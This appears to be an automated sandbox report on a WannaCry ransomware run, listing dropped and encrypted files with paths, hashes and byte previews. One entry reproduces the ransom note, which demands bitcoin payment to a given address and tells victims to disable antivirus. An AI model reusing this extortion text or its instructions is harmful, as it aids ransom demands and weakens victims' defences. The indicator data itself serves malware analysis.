Preview:	WANACRY!....pgNK..Z....\..}...)k{.b.........P.H.qg.....:.p/..L.Ycf`.q..o.....U.....Em..B......:#...sv....S.\.o..).R..K.._j..wXi.1.N.`[.I....g..U..^c.I..I.{c.........H6..]..T..0o...{3....%^..P..i$.z...S{........'%0....'...Jg.]vk....Eu..F...;....................6?..>.]....s..E..6.$nG.O..O.T..L.Q&+2d..B.U....?..u..l..Y.z..-).4..T.H..?\|..l.v......M....WY.z.c!.dOawy.<E[Q:.!....@.\:......R.-.."..8.........?H.........B(h..ZB.R<.8..$7K/..H..@.y.%..X.{.^...u..H..(.....:>..JT.....$A.N.U.........[.N.I..MA.v5...NF..w.F'0B.r.'I.o2./(o.x...u...W....... CgZ...KN..$1.../.(='.Q7..:.2.z..vf....1....!.K.....i..... ..".&:e..N....;UdOB.U...4:h....Y........`.Sp-.#...^)a".Bm.h.......MF.b..g...N....`.3.2.nz.....^X..#y.{...K..U.....lZ....T..-%h..s..F..5PHGZ8"q]......\|.g..!.:.p.{.qnjE.-..6.F.2.B.6...m..].YP]....P..`..(4...jFa#......K.%.<...`c..',H.P.Ry.V..GK.KW^.U.I..O..2.K......[...:n+..}.(./..I[...pS..E.Mb.]/..8..E."..hKU..h........T................

C:\Documents and Settings\user\Downloads\TQDFJHPUIU.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8379940164816
Encrypted:	false
SSDEEP:	24:bkgdaVjqxqtFRAaoNhQ6JgZMDLItiTcQsvvTV/iJI501GBbpjW8HOz:bkgsVjLtFR1Q66JgODL8mo3Tj5jRhVu
MD5:	71847DC9A82D4FD1F0B27A837DA0DEF6
SHA1:	41E03319AA2DE983A6DE0C719EB878F1D71637E8
SHA-256:	CCE26CE8C99398B650D0A386DFC0EEE60F15594ECF4A563DD934B58F160FD075
SHA-512:	445BDD5E4E5B47724CF818D050A32F533C4311E780B4D37DB9CE53EBF1E622B1563C5385BB13B4C0BD8898CB744EB1C491B9E6D6D1EE76727B1CD79339966AC5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....Kr.4..94..E...f..cX...s.@^.+]:..n. ..l.......#>.a...~>..Mx.4.l2..`..X.y/..K.!oi,.2....)Y......]v..H.a...Of.\n.....A..?.......m.1.h}....N1.l^..%.....G......":.#`...:h_.)U.....Lw....0S..?.d.w.;E.......$..y.=/).r.R.m.-.7.....^..._.~_..Y.H.F.\..................m.y..-.e.!Tc....>.%j.o.~gh......\|4...I.N.....O..xS.]q.&.!...>.....)..............L;,uf.s.......1..4U.3#...R..c.+.z.....z.-_.y\|...../j=....lGk..K\|...1w.-. ..5.E&!..I.&...6.'..oa..z.W..Yd.<...B[o.Z0R9...(........s...^%Y.....z....#C!...ST+.9..Z^J...PZ...(..1.\;K.d..)NZ.).k/H."a6.....+4.9;.....g).<...V.....N9ss..:../.j.. .R.>....\..mb....^...Y.2qpStE....[..g.k5..9...d.....%..W.f.`.i....`.[o.D-s..Uf.`.z.........W.J.......P...I.u8.."R.......W..(.z-.B.\|....Wv..7I...#.#i..l.tJ.=Tu.w..R._.xM...Y..O.....c..G.......c..h.....D..mCN..w].b../O.....B!..o.>R(L.(?c@-....)t.ei..(.x.o..f.]h......4.OIHZ.4MKJ..c...e....&l#CY.J.w.-......M.LI.p...o...T....}.\|....,..k*......KJh.a.u..@.

C:\Documents and Settings\user\Downloads\TQDFJHPUIU.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.847803354935925
Encrypted:	false
SSDEEP:	24:bkhpK5Hgk9qPHA2OX18KvQ1EEXrM+ajNhFWdqjgdhI4gqeNt7dHpngOiS7ZAuQX:bkhpK5X9qYll/I/54NhkdvqZqCJdHpnO
MD5:	FFCB63A8FE60AAB2399C8029BD9F51A2
SHA1:	FA50D15A607C53FC3D26A66C5E2759285978FDE7
SHA-256:	6F1DD41C15632BB4B192963E5ADAB645027F400FC74DA75D9E3024A1E71A345A
SHA-512:	BFC6FB5422F5DAB0F961C9AC42B69AE83A30114DE381FAD99ACC86FFE7E5ACA2E5DF73896C60038CA441DB571706686520DD2F2D0A23A1756B5693ACA0961CA5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....a."Q.....e.e1O..Y......Z.......w.wOD....tPi..H5(.......%..dJ,NKd.j...#..>d...=hBz.\|.,.tmd.......2......T..~_......,..c..g.(.3'...(.6.[.r.H...D$...J.ew..e.v.../...&..f......ikO4.1.R.i..M...d..'A.."'Q.C.X.B..^l..sc...J....s.E../...9.4...w?(..................J{..h.$T..[Q.tum....hz....c.....s..K-.....(S..3.t.=.QB..k.B..Gw.Z...."\.>.;u.Z..5~,Va..^.0..7V.P.xU.l.......~V.bd....C...2......^P...p..........5.......P..v....pT........B. ?nd...d%(.X\O.2.i.<........pO./.......l.uG..%?r.o..cM..v.0.v.}.5o.H.u..B...V....)#<z..`..........j.}..+.Da..@..:..M..#..q...Y`.v..w6.3..._.l.....x,c..&V....@....Z.....YgO..\o0.}'.PLB.G..PGO..w....).i.3<l............).7...iw.....m...\|?b...OM.(,..}E.WQ.l ...W_. &..P[m_~.X.?....~8.u..y....x,Q3M.!...8..S.a.I..LS.=.S..a..({.O.4;...PYC.5X..n.P....J..Dt.E.o.G..G.{.<.^.)Sr...b...l..u..rP.....86.....].X...^..n2...4....L.jk..........~l.....kK.d\f..YY.....{B;../i.?'.a4a(#b...r.....k.trY..&...8X

C:\Documents and Settings\user\Downloads\ZIPXYXWIOY.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.85137226627166
Encrypted:	false
SSDEEP:	24:bkoiYPk8IrT1n8DHdgAag7UN9qf/ejkfhQPpuW5tyB5FK9tSW9vE:bko1sT18xXt7UTIQRuWHfSW9M
MD5:	A87C80EE2C7B649E2B9CB0FFCD5CAE4E
SHA1:	9F692C31515E98CDE45583989951E2887B684761
SHA-256:	C24BCB61AB824E177ACE8C3EA626261EB9A26F59487DF39BE0F3A1D0AF5DBDC7
SHA-512:	BA8B5774C0CB864ADBDA093359D63DA9C0F02BB18336E14E191C910D39D71BA9AE44D2A6FDBB9F27635923FBFD807251F58C1C70AC19BE19E9B7066CF8FC03AA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!............9.....i...../.i.......^......+I...c..x<.....!.F'..M...jT.!..dE...~X.3...X...$ ..Z.....{...._w.$.._.F.@h..EX@ =..<...LzV..\.......V+.j.%.`.xk.e1%.!.c{.w..].....x!...Af...A.>5...Mr{.4...{M..Vvm.p.....R.=\...`..v:L'...E..'...d...:..U)&.P...............hD..8R-G..{...T1e2..I.PR...#pT}A..W.?..\|....tS...;..-).....gq\.g.@.....6o\.=.C...8.x.:...."..)...m.....t....<#...].Ab..>,..8..e.....g..k....p.....=....m.p.OWC..u._.&.;....A..n..ep...rv;.-..8h...T.9..r..@B...a.GWu'-@..L.5........2..K.'...K...-T......a...}.7.........!A.vw....>e..?.u..uo......).'..k..o..'.dZ..K.)e ......-.....A.ce.....y=O...X.}..c.'....e..dS..&j...9bG..?...O.0.\|.?.2f.k~!..9...Qby8.....$8..l......y..H._........D.)..{D.z... ..........N..W.......<.5.x#....m..:b...D.L..s.\|...P.,^..-."A.).D.gG.L[..8.V..l...4&....r..B....-5....0.qh.O...m .D9..x....1.....o.*1<.....[t.?......Sg..~..t6....".R...}..?/:..i...{.....(.G7.klT...f..`3/zC...z.?C.Y....,.W..I.B.u.^3..-.(.B.].

C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673654956717.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	111944
Entropy (8bit):	7.99837712860093
Encrypted:	true
SSDEEP:	1536:5JLg5lb838JukafE0CV/lIKeFcCGcdQTqi5F/hf+0FHTVc1sdbywxWiAtpoB9Yxl:AdJukCyqsTqcHtHmsdvxnB+lJkVQs5o
MD5:	D5B09F3558298B0C808091F5AB48FDAD
SHA1:	E5742597A31BD898E4552BE829BA4C9E7756AE85
SHA-256:	6E29C2F8F13EFE33F7E481B38CBC525DC40C3EE2AA4D87FE99631D4EBA6AA86C
SHA-512:	61AE686C60F1D45DD7E4AB65E234B27D188A3779A2F6CF54D66DADE9EE0C636D020B54A41819CC2696307F802E6ED94DB3728DC55B9405E48AB566E751CE525C
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....d..D@^=.e ...6.>\|..s............K.>F...XZ....lm...&..\|.....I....^.&.f.d.j.L.b........0.. ..s.@...%....>..f"C.u3...9.VL$.78....lt...5k\....b}X..X...F......7l4.U.Z.s...H..X.!7.....q......Ne.....6-Yp....x.vj%.e....B.iM\|9AL..].>.Oz....]q.&....#.......W_.O.f....k..t~.O..-\|\.(J.....z$^..j].@......KH.L..~..z.=NT}...`....R=....q..NZe4q....D...<.....DC..;.u...2;ob.#.d....>...ax>l?....kDh.7.C#.B1...evt.D...o.E.t..T.}..@...n....3..&..TC%0b...0..Xl.......Hi.B...n6..aM.d..9.n.W.<..K.;u.,.E(....v.aD9.....v.\|Fl..8.w...}MZLr........8..&..K.....N....@."..LV.z.L...5/g..C....\|W.....A...#......... B....8.M'.,.dco.\.>.u..z....../.G..aU%..@./..O.\|X..o..D.......p..1..n..El`.7)..V......../.SyACO.2...+.....<.....g...P?.M...\|....o....43.2...$.Uj.g.D..zH.&.g{........>..#..q..x....../}O8Q7.j7.6.*^..j....2..<.P..P...N.!...L........<........t.".s..M.D.].\..MN8.7.....!.X.%.Q...A.A.0`ik:%.B.e..b..}..7:A.D8S.v..5./\.vP..;Z...vx.r......hfk.w.....5.S...2

C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96ab5c09-25d6-4ec8-9dfa-01fef4843b90}\0.0.filtertrie.intermediate.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	47256
Entropy (8bit):	7.996311504565553
Encrypted:	true
SSDEEP:	768:rQRc8wq9OPK4glnUoQ7QI2A/7TcLgkX2QmqGsywk29zCFNZtzKeJKQDD46AbO:Cc879OPQUo3I2ETcLEQUsytmWFNZRKwb
MD5:	8BE1CC9E9DA3E18ECBB139DBA87AE4DE
SHA1:	D57BB34076D4EA194870FB8A1D8D1A4FD2237EE3
SHA-256:	A50BE809EBBA7AE4DC40F2193CFFE65AFB852A7321E9E7970DB7EF64B553693B
SHA-512:	7B158E138C1D3D824E53F84AAD57B166E90BD56C0DBC9AB10B0DEBEDDBDFCD780F837CE5F10070CF166EA85260667C4707A745790A137A850D3A02A992A8BA89
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....).^.h1.."s.m].zd.?N#...6Y..J..7..I.[......=...9.N....j. .vx.5.B.`.9....!1p.W.....)O\|..136....x~..0.....p.!..H-^).\..7'+.Y....mD......j.n.a.......y.....4.y&.8:.....$!.^g.X.$k.]...]...J...S.....<.k...8%.z).t4$.6.n.Q........'...C...R.....xj....y....y..........ni............G.....?D.)=l........d).P@E.I..N..D...[..Ig#..e._(._..y....#....6.L.?x}_.e..V....`...E.;.n.. . .U..N...EH..S)1.]...].0.F..e.wl...O{..o".E. [LV...2..AB(.$t..f..6.dN...?...t....RZT..\|..S..l..m...qUb.J....O..8s.\|..v..I...1qG...O..d..d_.VyO..T;.........K.0;u....1H.-0.2N..........PN3u.IuE..,Q....B.BT.D;..g.B..8f.5(.>..o..-%.j.3e...O.!....Z^ ....5.......=.......\|..!6.#'~.8.B....3Q..tW.@^..ul...CV....M>........((?.[.k...C.!.YB..H...q.y.K.@$..Kq.../:..h.4td.>.X....&.K......x....X... g....FHy...\4...!1.....E.`>n.."..v.m..Ur:.\|Vq.B...W...;..h.Gi..v2.H..5G...M...!.;{f.......OV.%..`....\|.3.".....sQc_.C......F...~j....E5....*p..1ZGg..xW.x".......r...t.....)A.x(.~"...s....,4&...

C:\ProgramData\Intel\GCC\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\ProgramData\Intel\GCC\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\ProgramData\Intel\GCC\IGCCSvc.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	20760
Entropy (8bit):	7.9915951212539795
Encrypted:	true
SSDEEP:	384:aJER8Yo5Jv2Cind7bUD1O0HbDdM590OtEMS/thdkvwaDceux2acw5pEzp:af549d5ODWX0OfSPYVuP956zp
MD5:	1E2F36CEE88D92AEFE7518E92946626D
SHA1:	9383B145615C14904A2902930592EB00BF53FF53
SHA-256:	CE70A5561B7A427DB5C492B33665AA26751BF20814E2CC19315FF9DDC9A235A4
SHA-512:	8E6039B573A62F8FCA86A95D929E4AEE3D66C3EEF65F1D6E65586B349BFB3F34096C11E5CBFE0D67B87517F18F829B1362352543F246FB3D2849E43E700E086F
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......B.5.X.'<9.._d...Zi&j... .r..W.....sY.(..k..j..+KA.....0.+..j)r.u\..K...5@.\|...s\B...(.O...;]m.8......Ak...'.....2..>........H}F.Xq.d.l.I3T}...T.s........z<\|9.....a.\|.r..W..N.egt.....$...~.Md......0c.w%..J..A.._..4!..8..&..<.=q.: T9.y....b.!.\.....P.......P.{.6..3H...Z];..@..GJ..H..Hk.7\...aT...Q..<..lO..Z......x..]..>.b.h..t.8.:^[.W-:..............=.n..v.}.R..g..ST.j.....<...&.wh.i.8..9Qb=W\|.)..<i".gj...t...J..R.N.....Q.(.E.>C_.!...'.N..e.=.V..r...>._#BxoH...@g".F.R2.^y.."..i,... .5<...m........=..r.<....k.....[qlfg.+"..R`Im.@?.~..u..{...@g.WH...,h.Y.X..b.......5M.[....2....N.8...HE...s...\|r...5.....)....I..j...q$".....".-..]?..}..d.v$...........8u.=..+..C.~$..l..>.'..V..~k....S..Z.jw.f.H..F.#h..:=K>:.Y.^1..n...Q...i.x....w3...YQv\..<......G[.:.KE..)N\|..~.xHH?k...Cd.....W..G...sA...p-..e..s.q2....q..L......K.`.Jv..'"...dS@.>'..!.a.........._y^b.. ...s.e.O\|..Ln..?...;..}.$6..[..G....J.....q....;...W33...6&....

C:\ProgramData\Intel\GCC\gcc_svc_log_2021-09-03.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1368
Entropy (8bit):	7.839412875468901
Encrypted:	false
SSDEEP:	24:bkFd9lVGlLiHFdAvaPe813fuF/Yd1xpoAVpwkUUPXddSYFqLkVw4bk/61:bkFd9/Hv0FABDVpw1UPt3FqLka4Q/I
MD5:	0D6BDAE6AE223B56A368CC24B051FCD2
SHA1:	42E5B526EB2FB626BF0CE199F0485743E34700C6
SHA-256:	4828CFCDB9DBBBF36F4702C2AE2DCACC10A84F5B34A8CC29E5669E21805D3D97
SHA-512:	2F24199F5F71315B54EB16BC72873CF05AA41F4067DC7AFC7B1C135BCC37D4D491ECFFCF7AED4033C57F85936647469028E0D8B42CA82ADCC0D7BBD7E092EA67
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....T/P..~.a-f.?.~op.. .@A...&S....cD...~....,....&...W......!.....C8..r.......+......<.$..F%P.p...U.\|F.t..{....n.z..:,...Of>..\|........._R.2g.0...i....<k.=..W.HP.(.\.$=N5.l...L.PX...,.$..V/......o....~..i..[.....S~2.t..+..'U.yq.6.vy..z....,..?....=..........~...?0.wg$v...0.5..L.....E...4Oo...N1.M_..`.....a.<..v...h.[.j....'.;..Z..T.....\....sN.Ab.D.j..2z.<.a..W2.@....u....C'.g..W:b..].'.$;t~..]..X.....yH..._.-wj3}..H.....C....w...E.L.:=}.vlNH~p~5f.........F.T..t.S....T.8'..P.......OM.C...RD..i..z..G..s...\.2V...J.....3n..6]..a..a.....i).\...aZ....M"{...C.>.i,......r*C{.. "..G.WZ)..]..L(.......M.....<.N/.l.b.ru....6._..'....M'...o.M....9y)}~.:....U.S).pbY..A.`.Z~blX.@m&..rg..K.....F...+.Q-.H.....A%...W......w^.sq."\i{..h..q@....u.-$O.&.L^.H.Q..2...~G....Y.D8..s.0....=.O.2)a.h.....&(ITf....U9M....%l(M...}=......W..h.)Ex..5."$r.Q..W.T#...'Y..yj...Ix.,.jk..;UN..rt.X...\|..x.b....ld.E...%................i.D{.m..'V.{.0.]..T.....8.?.

C:\ProgramData\Intel\GCC\gcc_svc_log_2021-09-14.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	5096
Entropy (8bit):	7.966846193416098
Encrypted:	false
SSDEEP:	96:onsE3a05Z6DWVG5OZZ1n4aWIUC0vW8NFsMRyqVHJVKidIC+QhEPYo8M0wn:oadSVZZjnVLN8NFXRy2Kid5P2PaFs
MD5:	AB73133664F61C5AC748E0316CAE2F2B
SHA1:	F08D809008A14AB02D5110DC8C2F8FE47386069E
SHA-256:	4FEFC2EC7F7CC9EEE26F902ECEA927D1520768683EA60B4E0FCD7F099FDCD728
SHA-512:	1298B7EA3FD4F770120A27E992E61DD9BA42479A6E1C56819B13B1F70662B4E5F83281348055DE3E63C84597DC39BAC21A4CAC7353B881FE669433A1CFC911B3
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......g.~.R..i..\.c..CsDT.7..r..H.r.sn8wq\..Y..%..o.p..B.G......+.L.... >.""......D..`.@.v%.....S{x.\|...LS..t4M...k.....DY.$Ckk.B\..X..f.5.f.0kw..5....f...[gp......W..=..'>.w8%.,pgX6....W,H.....d.'!.N4.T>........_.s........o...9.C>B1.7....M.<.0.............&...,. ....+..`_...)(...L.c....F}.X....5..._+.+.5.s...`.x.7.6"Q..........{.3`-.......?.....Lz..*.........\.T....t..E...Hs.....+...B...[..w.I^......uG~.sQg.F4x.7.....+foC.>X..h.....sd.$.\d.....P..f.......x}I.G.c.7H].[..8."+;.5.tN...T.<.P..jP...n.e..aMm3...#.......I.e.DX.....Zeg.J...;...SL..O..........FB.e.). .c_vU}."#........tV..=DU.t.........3v.aUq.......m.A.T..B.[......-....)^...yB..7..W..c@`/....q..#. ....D..N..!...E.V.f.;.m..H.SZ%i....\(......H8...r..n%J.Jz.?....Hr.+z..G.&.{.....IlQ.`..e......9.q^.LA..b.....Fe.).......N.I<.{..]......~..c.U+4l/?.">ck..y....e...be.l.c.X=\|jq..m.....T.........clJ@T........Q:......\|.....N....^,...V.xa..\|.....ja...S0.....6.T.fQ...U)b)...

C:\ProgramData\Intel\GCC\gcc_svc_log_2021-09-22.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	5096
Entropy (8bit):	7.9579772309830155
Encrypted:	false
SSDEEP:	96:ooGTzlvwYIUdu3iZYu8gf2ITDxLCarHXCoTM28tFpKsI5QYtKzTUhY:v8VQgfnRGYSoQhtFpK1qYtKvUhY
MD5:	CEF40BC1ABEF7B4990FCC9469F271F76
SHA1:	D47D6232C40BBE114EBF76DE037ABB5DC884859C
SHA-256:	A9099E61E308F8921D6713B1FF415E86BFD455CD51F7164BF4E7922D80C5050A
SHA-512:	63701372445160CA89C8669B464F9ABFB76B9FC6436F2690137887723083596557C8285BA449C2FFF22C4E78062EBA3605D83BC60F0B86218723FE193534B226
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!..... .>6.<..\|..b"..!...`.Y.%9\.J........l.G.-.k>I.D-..d.4..&..'}.+.&..TlZ./[zW......Z...j.0Vl+...6S.m7..ml&..L..N;..K.}...AByz. b........2P..@v;.Z.5V>.......O>'S....C_./=..8c.aiz...0...E.%..kb.....aQ....r..S~.'u......@..CM..tE.....P.........1..>.................B%&t..]../.#.H..,..y........\|./.NQ...5r.c.@F+." ..s8M...O.L...?.P..6#z..p.m.B...mwJ.+......[...f.....p.....6"..a.p...B.....+o.....h..Y...ZJ$:8.o...4.`.V...u..a....+t.x...V.n.Z...cC.......3\|......{.......O.J.2M.. ah.N.z...\|D...F..l.oKk@.e.#)y..[H1........R......h...S'..{.`...- T..( .=..?C..lm.CR.).Z(.g....a..<.,g.Qw._-.B...X E...{.x0u9.Z..E............}.-..8.UL.b.O.^77m....N..P..=4..J.nq..........8z.].-Q.c....y..r.........@-..A...=.UQ...\|.&..{.).P...O.w...UC..J...P..#...w....J........g.y.0RZ.i.J......u.j.E...-...fn O..(..a..R.O...#'......>.pP0......0..k....ar.'...b.`.E..4..~5....%z;8}..G.....U]..5...OD.._...((...}A......P.3.A7.IS.2..#.=.El......W.t..`.$.S..(;..,..U..iN.s.9..

C:\ProgramData\Intel\GCC\gcc_svc_log_2021-09-30.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1032
Entropy (8bit):	7.809707629705528
Encrypted:	false
SSDEEP:	24:bkGvhKpxVJljybIz0orHjKvAV4SJtXthlpcMkZi/wH5Ix:bkGgpxflE6j74SfXthZ5B
MD5:	11E0DB5B5405DC34EF41D0910B46DE40
SHA1:	B6E5B6C2A77E4A807A633F92440FBC7E3F9E86B8
SHA-256:	3DDEA103C8F8D6CD29CBB3E34F8CA743665F4EEBDF4F4A3429BF0AE2733ADDE1
SHA-512:	47E301930ABB0D85844F67CD052B73B97198C485863D814C30BEAEC3E51B51A54A8945A5100FC96FFA2A1D7E7FB6863FCF8BE82333AFF9C584265F2905D4FD78
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....E...K.j...(..a.+X....g..{.....N.b.!.......O...N.3-7.).0..I.AR9Km.{..+.wd.Q.a.l...1....Ke.a.,Q.G.:..@.{...+Y".z....U@.O...L2..r.2V...fp..j.`U...+..pSY.~..Z....{O.z...}..d...L.p.^.'....&.E~l.]."..... .2.;.~....7.5...\Y..bL!K..........0.Q[8....................i..-9.Zv.......$-..Qu..e.Q.N...D..6..n.d..Xa..$..hs.6.O.....Nd........5..M.....N.......U...ge..b...)...L.&.C.Y.....G.......\|W0JiF6OA..=..k.w.c.j.7._J...DT.h.L....1....N" K.yf .>.m.34."5...T..."..-B.....8..{@..t....M.#,..X....n.........9..y....n....)\|=...g.HAxE?z.)D....u.6.....W.!FE.....z..>....>Q...u.....Las......&.U...s.PN.......K.tD.qz. 47..6V......>.h....c.?..c......o.j$..N..]n..{..N#D..A...z.+,...T.C8)yY..T.B...>.e.q.sv...9..>.v... .s/p....)y.yjt.............E..+.z..0.T..+._.J.........W. ..'.2.f...A.K..e...hG..c.J...F.r.....Q9...."4{o8@.%M..;............V..._Vp...m{....x"....N...[..&.a.z...).h.h...d'J<.`......Id7Wf...D............gx...=[`DL...~..Y.`....wD.F.e.........h..u.b

C:\ProgramData\Intel\GCC\gcc_svc_log_2022-01-20.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1112
Entropy (8bit):	7.810806508676208
Encrypted:	false
SSDEEP:	24:bkcPKcJ3bpDbhLjJViRRGW6faKtyNMcIcKpP0N0D8Sk:bkcPzxbpDRJIHGpfaYyN/KpsN0Nk
MD5:	F59E0943C87C868FFB8F3CC345430395
SHA1:	AFC529F6A60C1EC95C53DA86358C68DFACF0D79D
SHA-256:	F99158192AB964266669C4C298F57E71490FA3B2977A7970C0B135C6C411E012
SHA-512:	DE2EB8FC5849D5F3B8E8358B86018B3BB9772144C06534BF0118505A0CDEF84AC739225E5680F186943940A4E1FF84341B3A93F2B673AC3AC03596FCF7CDC564
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......ZwmO....8.\|......%..I.5.......U.#5..../....].....I.q./.a.5.L..H..D^N......I..}"....V.a:6..Y...._pQ..<.%..f2...#.......7.......BJ....Qm...........fw....;y0o...Uz.[..Q..N.....:.....<M./...mg..;...\..g..z)....B..).u.'.A.+F.!..c..B.k.j...9....>.........j..y....{...`%.}..:i.......~..,.E...r..3cBEB!.E..i\....K......>g.O.C.O.<O.HxLC..k..>.v..vN...7.)'...&._'reKj.x6..C..r4k../...G.H_.H,n.m..`d....c.......J#.OLhb..-....K..VN..}..6...g..za...a..;.I.9.c...)kuZ">..l...E....!.9.....m=.5.j.....t..&7..$...%.@.......6X.6.qs..u.....lL.g.....z.R...:`2.Y.[Z+.'M.E.\..4<.R...@35..%......e...b.m$M.....y...E.....<.y..m.}B.kcl.o.2s.........B..u.v...R.......t].p..o\|..".4.G.^.....^....?..\|<...MBA..Z.. [.,.....w..[.... ..b../1....)@.N.S97.+i.E..v.s...b...~qZ...9B.r..H%...".gX[n 2.#.K.'..:.\.OY..:....L...9....."....b......2..z.)!Mz.....Y..!..)y.@.0.G....cQ.......!x.....\]@..\....n+^....u....,.K..{..xE.....8/..p7.....G~.ze.n.......

C:\ProgramData\Intel\GCC\gcc_svc_log_2022-02-23.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1768
Entropy (8bit):	7.882989626229696
Encrypted:	false
SSDEEP:	48:bkb5SjNqDKkwdm1RojAfjuVLwwIj5OnFl7MuLo/P+X:otSEDKkVXig+c+7Muo/P6
MD5:	CB9130BEC9A23F9AA686877937978078
SHA1:	7ACB4D01AE447A5C8AF837CEB9342EE8DAD4418B
SHA-256:	B12C642595BE3D46C7AD1653896AF1A0B5DD0FE46AEFB421CC253E49307B1E35
SHA-512:	4004A7A777BAA2B928D1C86F3738C6C226319021FC8950048D985F88A83F82CEB27C8DA396A7BB28D80D3D69F74ADD45E6B4D0BAC309F86D31DD560936503213
Malicious:	false
Reputation:	unknown
